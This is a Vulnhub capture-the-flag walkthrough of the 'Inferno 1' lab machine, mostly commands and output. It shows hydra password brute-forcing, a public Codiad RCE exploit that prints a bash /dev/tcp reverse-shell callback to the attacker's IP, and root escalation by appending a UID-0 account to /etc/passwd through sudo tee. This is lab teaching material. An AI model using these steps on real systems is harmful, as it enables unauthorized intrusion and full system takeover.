Vulnhub: Inferno 1 box walkthrough
Inferno 1.1
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9a:82:57 1 60 PCS Systemtechnik GmbH
192.168.56.217 08:00:27:be:5e:e0 1 60 PCS Systemtechnik GmbH
Using Kali Linux's bundled netdiscover tool, the target host's IP address is identified as 192.168.56.217.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.217 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-24 06:09 EST
Nmap scan report for localhost (192.168.56.217)
Host is up (0.00034s latency).
Not shown: 65444 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 82:f4:d2:47:74:86:2f:b4:94:62:cd:31:f6:ef:51:a4 (RSA)
| 256 01:e9:02:a3:ff:ff:4a:7b:f2:20:1e:0b:44:9d:7f:f7 (ECDSA)
|_ 256 a5:dc:a7:b1:20:33:f1:8d:c7:dd:f1:a3:59:5d:c2:34 (ED25519)
23/tcp open telnet?
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain?
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Dante's Inferno
|_http-server-header: Apache/2.4.38 (Debian)
88/tcp open kerberos-sec?
106/tcp open pop3pw?
110/tcp open pop3?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
194/tcp open irc?
|_irc-info: Unable to open connection
389/tcp open ldap?
443/tcp open https?
464/tcp open kpasswd5?
636/tcp open ldapssl?
750/tcp open kerberos?
775/tcp open entomb?
777/tcp open multiling-http?
779/tcp open unknown
783/tcp open spamassassin?
808/tcp open ccproxy-http?
873/tcp open rsync?
1001/tcp open webpush?
1178/tcp open skkserv?
1210/tcp open eoss?
1236/tcp open bvcontrol?
1300/tcp open h323hostcallsc?
1313/tcp open bmc_patroldb?
1314/tcp open pdps?
1529/tcp open support?
2000/tcp open cisco-sccp?
2003/tcp open finger?
|_finger: ERROR: Script execution failed (use -d to debug)
2121/tcp open ccproxy-ftp?
2150/tcp open dynamic3d?
2600/tcp open zebrasrv?
2601/tcp open zebra?
2602/tcp open ripd?
2603/tcp open ripngd?
2604/tcp open ospfd?
2605/tcp open bgpd?
2606/tcp open netmon?
2607/tcp open connection?
2608/tcp open wag-service?
2988/tcp open hippad?
2989/tcp open zarkov?
4224/tcp open xtell?
4557/tcp open fax?
4559/tcp open hylafax?
4600/tcp open piranha1?
4949/tcp open munin?
5051/tcp open ida-agent?
5052/tcp open ita-manager?
5151/tcp open esri_sde?
5354/tcp open mdnsresponder?
5355/tcp open llmnr?
5432/tcp open postgresql?
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
5555/tcp open freeciv?
5666/tcp open nrpe?
5667/tcp open unknown
5674/tcp open hyperscsi-port?
5675/tcp open v5ua?
5680/tcp open canna?
6346/tcp open gnutella?
6514/tcp open syslog-tls?
6566/tcp open sane-port?
6667/tcp open irc?
|_irc-info: Unable to open connection
8021/tcp open ftp-proxy?
8081/tcp open blackice-icecap?
8088/tcp open radan-http?
8990/tcp open http-wmap?
9098/tcp open unknown
9359/tcp open unknown
9418/tcp open git?
9673/tcp open unknown
10000/tcp open snet-sensor-mgmt?
10081/tcp open famdc?
10082/tcp open amandaidx?
10083/tcp open amidxtape?
11201/tcp open smsqp?
15345/tcp open xpilot?
17001/tcp open unknown
17002/tcp open unknown
17003/tcp open unknown
17004/tcp open unknown
20011/tcp open unknown
20012/tcp open ss-idi-disc?
24554/tcp open binkp?
27374/tcp open subseven?
30865/tcp open unknown
57000/tcp open unknown
60177/tcp open unknown
60179/tcp open unknown
MAC Address: 08:00:27:BE:5E:E0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 770.19 seconds
The Nmap scan reports a very large number of open ports, but almost all of them carry a trailing "?", which means Nmap got no usable banner and only guessed the service from the port number. Only 22 (OpenSSH 7.9p1) and 80 (Apache 2.4.38) returned real fingerprints. That pattern suggests decoy ports, so the next step is to confirm one by hand:
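As an added example (not part of the original walkthrough), the following shell functions separate the ports Nmap actually fingerprinted from the ones it only guessed by port number. SAMPLE is constructed from a handful of lines of the -oN output above; the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original walkthrough.
# Nmap appends "?" to a service name when it only guessed it from the port
# number and got no usable banner. On a host that answers on dozens of ports
# those are the ones to distrust. SAMPLE is constructed from lines of the
# -oN output on this page.
SAMPLE='PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
23/tcp open telnet?
80/tcp open http Apache httpd 2.4.38 ((Debian))
779/tcp open unknown
5432/tcp open postgresql?'

# confirmed_ports SCAN -> space-separated port numbers whose service was
# fingerprinted (no trailing "?", not "unknown")
confirmed_ports() {
  printf '%s\n' "$1" | awk '
    $1 ~ /^[0-9]+\/tcp$/ && $2 == "open" && $3 !~ /\?$/ && $3 != "unknown" {
      sub(/\/tcp$/, "", $1); printf "%s%s", sep, $1; sep = " "
    }
    END { print "" }'
}

# unconfirmed_count SCAN -> number of open ports Nmap could not fingerprint
unconfirmed_count() {
  printf '%s\n' "$1" | awk '
    $1 ~ /^[0-9]+\/tcp$/ && $2 == "open" && ($3 ~ /\?$/ || $3 == "unknown") { n++ }
    END { print n + 0 }'
}

# Usage on the real scan file written with -oN:
#   confirmed_ports "$(cat nmap_full_scan)"
#   unconfirmed_count "$(cat nmap_full_scan)"
```

Run against the full nmap_full_scan file this leaves only 22 and 80 in the confirmed list. The ftp attempt below is the manual check for one of the unconfirmed ports: Nmap showed 21 as open, yet a real TCP client gets "Connection refused".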
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ftp 192.168.56.217
ftp: Can't connect to `192.168.56.217:21': Connection refused
ftp: Can't connect to `192.168.56.217:ftp'
ftp> quit
FTP is not really open: the connection is refused. So the real attack surface is port 80, which is examined next:
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ wget http://192.168.56.217/1.jpg
--2022-11-24 06:26:54-- http://192.168.56.217/1.jpg
Connecting to 192.168.56.217:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 680065 (664K) [image/jpeg]
Saving to: ‘1.jpg’
1.jpg 100%[=====================================================>] 664.13K --.-KB/s in 0.003s
2022-11-24 06:26:54 (229 MB/s) - ‘1.jpg’ saved [680065/680065]
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ls
1.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ steghide extract -sf 1.jpg
Enter passphrase:
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ stegseek 1.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.48% (132.7 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ nikto -h http://192.168.56.217
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.217
+ Target Hostname: 192.168.56.217
+ Target Port: 80
+ Start Time: 2022-11-24 06:27:58 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 27e, size: 5b3384f358000, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time: 2022-11-24 06:28:46 (GMT-5) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ gobuster dir -u http://192.168.56.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.217
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/24 06:29:13 Starting gobuster in directory enumeration mode
===============================================================
/inferno (Status: 401) [Size: 461]
/server-status (Status: 403) [Size: 279]
Progress: 216786 / 220561 (98.29%)
===============================================================
2022/11/24 06:29:37 Finished
===============================================================
This turns up the directory /inferno, which is protected by HTTP Basic authentication (401). With no other leads, brute-forcing /inferno is the only option. Using hydra's http-get module with the username guessed as admin; against a full wordlist such a crack can take a very long time:
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 192.168.56.217 http-get /inferno/ -t 64
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-24 07:43:46
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://192.168.56.217:80/inferno/
[80][http-get] host: 192.168.56.217 login: admin password: dante1
[STATUS] attack finished for 192.168.56.217 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-24 07:44:23
The cracked password is dante1. Log in to the /inferno page with it.
The page title shows Codiad (a web-based IDE). Check whether this application has known exploits:
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ searchsploit codiad
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated) | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2) | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3) | multiple/webapps/49907.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (4) | multiple/webapps/50474.txt
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ searchsploit -m multiple/webapps/49705.py
Exploit: Codiad 2.8.4 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49705
Path: /usr/share/exploitdb/exploits/multiple/webapps/49705.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Vulnhub/Inferno/49705.py
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ls
1.jpg 49705.py nmap_full_scan
But running 49705.py kept failing. Following hints from other write-ups, I found a similar exploit for the same vulnerability written in Python 2:
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ git clone https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit.git
Cloning into 'Codiad-Remote-Code-Execute-Exploit'...
remote: Enumerating objects: 133, done.
remote: Total 133 (delta 0), reused 0 (delta 0), pack-reused 133
Receiving objects: 100% (133/133), 2.15 MiB | 2.80 MiB/s, done.
Resolving deltas: 100% (56/56), done.
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ls
1.jpg 49705.py Codiad-Remote-Code-Execute-Exploit nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ cd Codiad-Remote-Code-Execute-Exploit
┌──(kali㉿kali)-[~/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit]
└─$ ls
exploit.py img README.md
┌──(kali㉿kali)-[~/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit]
└─$ python exploit.py http://admin:dante1/192.168.56.217/inferno/ admin dante1 192.168.56.206 5555 linux
File "/home/kali/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit/exploit.py", line 22
print "[+] Login Content : %s" % (content)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
┌──(kali㉿kali)-[~/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit]
└─$ python2 exploit.py http://admin:dante1/192.168.56.217/inferno/ admin dante1 192.168.56.206 5555 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/192.168.56.206/5556 0>&1 2>&1"' | nc -lnvp 5555
nc -lnvp 5556
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
Traceback (most recent call last):
File "exploit.py", line 160, in <module>
main()
File "exploit.py", line 143, in main
if not login(domain, username, password):
File "exploit.py", line 20, in login
response = session.post(url, data=data, verify=False)
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 578, in post
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 516, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 459, in prepare_request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 314, in prepare
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 382, in prepare_url
requests.exceptions.InvalidURL: Failed to parse: http://admin:dante1/192.168.56.217/inferno//components/user/controller.php?action=authenticate
┌──(kali㉿kali)-[~/Vulnhub/Inferno/Codiad-Remote-Code-Execute-Exploit]
└─$ python2 exploit.py http://admin:dante1@192.168.56.217/inferno/ admin dante1 192.168.56.206 5555 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/192.168.56.206/5556 0>&1 2>&1"' | nc -lnvp 5555
nc -lnvp 5556
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"admin"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"inferno","path":"\/var\/www\/html\/inferno"}}
[+] Writeable Path : /var/www/html/inferno
[+] Sending payload...
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ echo 'bash -c "bash -i >/dev/tcp/192.168.56.206/5556 0>&1 2>&1"' | nc -lnvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.217] 38566
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ sudo nc -nlvp 5556
[sudo] password for kali:
listening on [any] 5556 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.217] 44524
bash: cannot set terminal process group (500): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Inferno:/var/www/html/inferno/components/filemanager$
www-data@Inferno:/home/dante$ ls -alh
ls -alh
total 64K
drwxr-xr-x 11 dante dante 4.0K Dec 6 2020 .
drwxr-xr-x 3 root root 4.0K Dec 6 2020 ..
-rw------- 1 dante dante 52 Dec 6 2020 .Xauthority
lrwxrwxrwx 1 root root 9 Dec 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 dante dante 220 Dec 6 2020 .bash_logout
-rw-r--r-- 1 dante dante 3.5K Dec 6 2020 .bashrc
drwxr-xr-x 3 dante dante 4.0K Dec 6 2020 .local
-rw-r--r-- 1 dante dante 807 Dec 6 2020 .profile
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Desktop
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Documents
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Downloads
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Music
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Pictures
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Public
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Templates
drwxr-xr-x 2 root root 4.0K Dec 6 2020 Videos
-rw------- 1 dante dante 33 Dec 6 2020 local.txt
www-data@Inferno:/home/dante$ cd Downloads
cd Downloads
www-data@Inferno:/home/dante/Downloads$ ls -alh
ls -alh
total 8.3M
drwxr-xr-x 2 root root 4.0K Dec 6 2020 .
drwxr-xr-x 11 dante dante 4.0K Dec 6 2020 ..
-rw-r--r-- 1 root root 1.5K Nov 3 2020 .download.dat
-rwxr-xr-x 1 root root 136K Dec 6 2020 CantoI.docx
-rwxr-xr-x 1 root root 144K Dec 6 2020 CantoII.docx
-rwxr-xr-x 1 root root 95K Dec 6 2020 CantoIII.docx
-rwxr-xr-x 1 root root 67K Dec 6 2020 CantoIV.docx
-rwxr-xr-x 1 root root 136K Dec 6 2020 CantoIX.docx
-rwxr-xr-x 1 root root 43K Dec 6 2020 CantoV.docx
-rwxr-xr-x 1 root root 136K Dec 6 2020 CantoVI.docx
-rwxr-xr-x 1 root root 144K Dec 6 2020 CantoVII.docx
-rwxr-xr-x 1 root root 3.6M Dec 6 2020 CantoVIII.docx
-rwxr-xr-x 1 root root 67K Dec 6 2020 CantoX.docx
-rwxr-xr-x 1 root root 119K Dec 6 2020 CantoXI.docx
-rwxr-xr-x 1 root root 154K Dec 6 2020 CantoXII.docx
-rwxr-xr-x 1 root root 209K Dec 6 2020 CantoXIII.docx
-rwxr-xr-x 1 root root 144K Dec 6 2020 CantoXIV.docx
-rwxr-xr-x 1 root root 144K Dec 6 2020 CantoXIX.docx
-rwxr-xr-x 1 root root 95K Dec 6 2020 CantoXV.docx
-rwxr-xr-x 1 root root 136K Dec 6 2020 CantoXVI.docx
-rwxr-xr-x 1 root root 119K Dec 6 2020 CantoXVII.docx
-rwxr-xr-x 1 root root 2.7M Dec 6 2020 CantoXVIII.docx
-rwxr-xr-x 1 root root 67K Dec 6 2020 CantoXX.docx
www-data@Inferno:/home/dante/Downloads$ cat .download.data
cat .download.data
cat: .download.data: No such file or directory
www-data@Inferno:/home/dante/Downloads$ cd .download.data
cd .download.data
bash: cd: .download.data: No such file or directory
www-data@Inferno:/home/dante/Downloads$ cd .download.dat
cd .download.dat
bash: cd: .download.dat: Not a directory
www-data@Inferno:/home/dante/Downloads$ cat .download.dat
cat .download.dat
c2 ab 4f 72 20 73 65 e2 80 99 20 74 75 20 71 75 65 6c 20 56 69 72 67 69 6c 69 6f 20 65 20 71 75 65 6c 6c 61 20 66 6f 6e 74 65 0a 63 68 65 20 73 70 61 6e 64 69 20 64 69 20 70 61 72 6c 61 72 20 73 c3 ac 20 6c 61 72 67 6f 20 66 69 75 6d 65 3f c2 bb 2c 0a 72 69 73 70 75 6f 73 e2 80 99 69 6f 20 6c 75 69 20 63 6f 6e 20 76 65 72 67 6f 67 6e 6f 73 61 20 66 72 6f 6e 74 65 2e 0a 0a c2 ab 4f 20 64 65 20 6c 69 20 61 6c 74 72 69 20 70 6f 65 74 69 20 6f 6e 6f 72 65 20 65 20 6c 75 6d 65 2c 0a 76 61 67 6c 69 61 6d 69 20 e2 80 99 6c 20 6c 75 6e 67 6f 20 73 74 75 64 69 6f 20 65 20 e2 80 99 6c 20 67 72 61 6e 64 65 20 61 6d 6f 72 65 0a 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 63 65 72 63 61 72 20 6c 6f 20 74 75 6f 20 76 6f 6c 75 6d 65 2e 0a 0a 54 75 20 73 65 e2 80 99 20 6c 6f 20 6d 69 6f 20 6d 61 65 73 74 72 6f 20 65 20 e2 80 99 6c 20 6d 69 6f 20 61 75 74 6f 72 65 2c 0a 74 75 20 73 65 e2 80 99 20 73 6f 6c 6f 20 63 6f 6c 75 69 20 64 61 20 63 75 e2 80 99 20 69 6f 20 74 6f 6c 73 69 0a 6c 6f 20 62 65 6c 6c 6f 20 73 74 69 6c 6f 20 63 68 65 20 6d e2 80 99 68 61 20 66 61 74 74 6f 20 6f 6e 6f 72 65 2e 0a 0a 56 65 64 69 20 6c 61 20 62 65 73 74 69 61 20 70 65 72 20 63 75 e2 80 99 20 69 6f 20 6d 69 20 76 6f 6c 73 69 3b 0a 61 69 75 74 61 6d 69 20 64 61 20 6c 65 69 2c 20 66 61 6d 6f 73 6f 20 73 61 67 67 69 6f 2c 0a 63 68 e2 80 99 65 6c 6c 61 20 6d 69 20 66 61 20 74 72 65 6d 61 72 20 6c 65 20 76 65 6e 65 20 65 20 69 20 70 6f 6c 73 69 c2 bb 2e 0a 0a 64 61 6e 74 65 3a 56 31 72 67 31 6c 31 30 68 33 6c 70 6d 33 0awww-data@Inferno:/home/dante/Downloads$
Decoding the hex (for example with CyberChef's "From Hex") yields Italian verse from Canto I of Dante's Inferno, followed by a final line dante:V1rg1l10h3lpm3. So dante's password is V1rg1l10h3lpm3.
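As an added example (not part of the original walkthrough), the same decoding can be done on the box itself without CyberChef. SAMPLE_HEX is constructed from the first bytes of the verse above plus the file's final credential line; the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original walkthrough.
# Decode a space-separated hex dump like .download.dat in plain POSIX sh and
# pull out any "name:secret" line from the decoded text. SAMPLE_HEX is
# constructed: the first bytes of the verse on this page plus its last line.
SAMPLE_HEX='c2 ab 4f 72 20 73 65 e2 80 99 20 74 75 0a 64 61 6e 74 65 3a 56 31 72 67 31 6c 31 30 68 33 6c 70 6d 33 0a'

# hex_to_bytes HEX -> raw bytes on stdout. Each byte is turned into an octal
# escape, which POSIX printf understands (the \xHH form is not portable).
hex_to_bytes() {
  for b in $1; do
    printf "$(printf '\\%03o' "$((0x$b))")"
  done
}

# extract_cred HEX -> the last decoded line that looks like "name:secret".
# LC_ALL=C and -a keep grep from treating the UTF-8 verse as binary data.
extract_cred() {
  hex_to_bytes "$1" | LC_ALL=C grep -a -E '^[A-Za-z0-9_]+:[^[:space:]]+$' | tail -n 1
}

# Usage on the target:
#   extract_cred "$(cat /home/dante/Downloads/.download.dat)"
```

On the real file the last line matches the credential pattern, so extract_cred prints dante:V1rg1l10h3lpm3 straight from the reverse shell. If xxd is installed, `xxd -r -p` does the same byte conversion as hex_to_bytes.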
SSH login as dante
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ ssh dante@192.168.56.217
The authenticity of host '192.168.56.217 (192.168.56.217)' can't be established.
ED25519 key fingerprint is SHA256:6G6ekHIDCC2b1vcJkyf1EFkDe6oT6YDmwyhvpcoZ8eM.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.217' (ED25519) to the list of known hosts.
dante@192.168.56.217's password:
Linux Inferno 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Dec 6 08:00:42 2020 from 192.168.1.124
dante@Inferno:~$ id
uid=1000(dante) gid=1000(dante) groups=1000(dante),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User dante may run the following commands on Inferno:
(root) NOPASSWD: /usr/bin/tee
The GTFOBins entry for tee (Sudo) explains:
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"
tee can therefore be used to escalate privileges. Because sudo runs it as root, it can append to any file, including /etc/passwd, so we append a new user with UID 0 (that is, a root-equivalent account). First generate a password hash on Kali:
┌──(kali㉿kali)-[~/Vulnhub/Inferno]
└─$ mkpasswd -m sha-512
Password:
$6$QFXbcTQJJ.RBIqRS$8KIreL9vJz/AdolbZ8gTgJ7pS467Ir9TWBqiYX6y0sDDQUWE/edQ6i2J2tHyIhKSsqdU.qtWFj9RxN7rX48nD0
dante@Inferno:~$ LFILE=/etc/passwd
dante@Inferno:~$ echo 'jason:$6$QFXbcTQJJ.RBIqRS$8KIreL9vJz/AdolbZ8gTgJ7pS467Ir9TWBqiYX6y0sDDQUWE/edQ6i2J2tHyIhKSsqdU.qtWFj9RxN7rX48nD0:0:0:root:/root:/bin/bash' | sudo tee -a "$LFILE"
jason:$6$QFXbcTQJJ.RBIqRS$8KIreL9vJz/AdolbZ8gTgJ7pS467Ir9TWBqiYX6y0sDDQUWE/edQ6i2J2tHyIhKSsqdU.qtWFj9RxN7rX48nD0:0:0:root:/root:/bin/bash
dante@Inferno:~$ su - jason
Password:
root@Inferno:~# cd /root
root@Inferno:~# ls -alh
total 36K
drwx------ 3 root root 4.0K Dec 6 2020 .
drwxr-xr-x 18 root root 4.0K Dec 6 2020 ..
lrwxrwxrwx 1 root root 9 Dec 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Dec 6 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 dante dante 9.3K Dec 6 2020 proof.txt
-rw-r--r-- 1 root root 66 Dec 6 2020 .selected_editor
root@Inferno:~# cat proof.txt
logout
dante@Inferno:~$
dante@Inferno:~$
STRIVE FOR PROGRESS, NOT FOR PERFECTION
